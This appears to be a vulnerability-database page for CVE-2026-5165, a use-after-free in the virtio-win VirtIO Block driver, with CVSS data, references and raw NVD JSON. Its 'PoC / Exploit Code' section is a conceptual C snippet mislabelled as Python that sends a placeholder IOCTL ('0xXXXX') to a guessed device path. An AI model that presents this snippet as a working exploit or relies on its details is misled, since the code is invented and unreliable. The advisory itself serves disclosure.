CVE-2026-5165

Description

A flaw was found in virtio-win, specifically within the VirtIO Block (BLK) device. When the device undergoes a reset, it fails to properly manage memory, resulting in a use-after-free vulnerability. This issue could allow a local attacker to corrupt system memory, potentially leading to system instability or unexpected behavior.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redhat:virtio-win:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:* - VULNERABLE

virtio-win (修复版本之前)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Conceptual Proof of Concept for CVE-2026-5165
// This code demonstrates triggering the device reset to induce the UAF.

#include <windows.h>
#include <stdio.h>

// Define the specific IOCTL code for VirtIO Block Reset (Hypothetical)
#define IOCTL_VIRTIO_BLK_RESET 0xXXXX

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    BOOL result;

    // Attempt to open the VirtIO Block device
    // Note: This requires Administrative privileges
    hDevice = CreateFile(L"\\\\.\\VirtIO_BLK", 
                         GENERIC_READ | GENERIC_WRITE, 
                         0, 
                         NULL, 
                         OPEN_EXISTING, 
                         FILE_ATTRIBUTE_NORMAL, 
                         NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. Error: %d\n", GetLastError());
        return 1;
    }

    printf("Device opened. Sending reset command...\n");

    // Send the IOCTL to trigger the reset logic
    result = DeviceIoControl(hDevice, 
                             IOCTL_VIRTIO_BLK_RESET, 
                             NULL, 0, 
                             NULL, 0, 
                             &bytesReturned, 
                             NULL);

    if (result) {
        printf("Reset command sent successfully.\n");
        printf("If vulnerable, the system may now experience instability or a crash due to UAF.\n");
    } else {
        printf("IOCTL failed. Error: %d\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5165
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5165
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5165/
[4] VulDB https://vuldb.com/cve/CVE-2026-5165
[5] https://access.redhat.com/security/cve/CVE-2026-5165
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2453015
[7] https://github.com/virtio-win/kvm-guest-drivers-windows/pull/1493

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5165", "sourceIdentifier": "[email protected]", "published": "2026-03-30T15:16:36.520", "lastModified": "2026-04-28T14:17:41.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in virtio-win, specifically within the VirtIO Block (BLK) device. When the device undergoes a reset, it fails to properly manage memory, resulting in a use-after-free vulnerability. This issue could allow a local attacker to corrupt system memory, potentially leading to system instability or unexpected behavior."}, {"lang": "es", "value": "Se encontró una falla en virtio-win, específicamente dentro del dispositivo VirtIO Block (BLK). Cuando el dispositivo sufre un reinicio, no gestiona la memoria correctamente, lo que resulta en una vulnerabilidad de uso después de liberación. Este problema podría permitir a un atacante local corromper la memoria del sistema, lo que podría llevar a inestabilidad del sistema o comportamiento inesperado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-825"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:virtio-win:-:*:*:*:*:*:*:*", "matchCriteriaId": "3C9702E9-461D-4BEC-9AD4-EE6C8D5E3327"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-5165", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453015", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/virtio-win/kvm-guest-drivers-windows/pull/1493", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}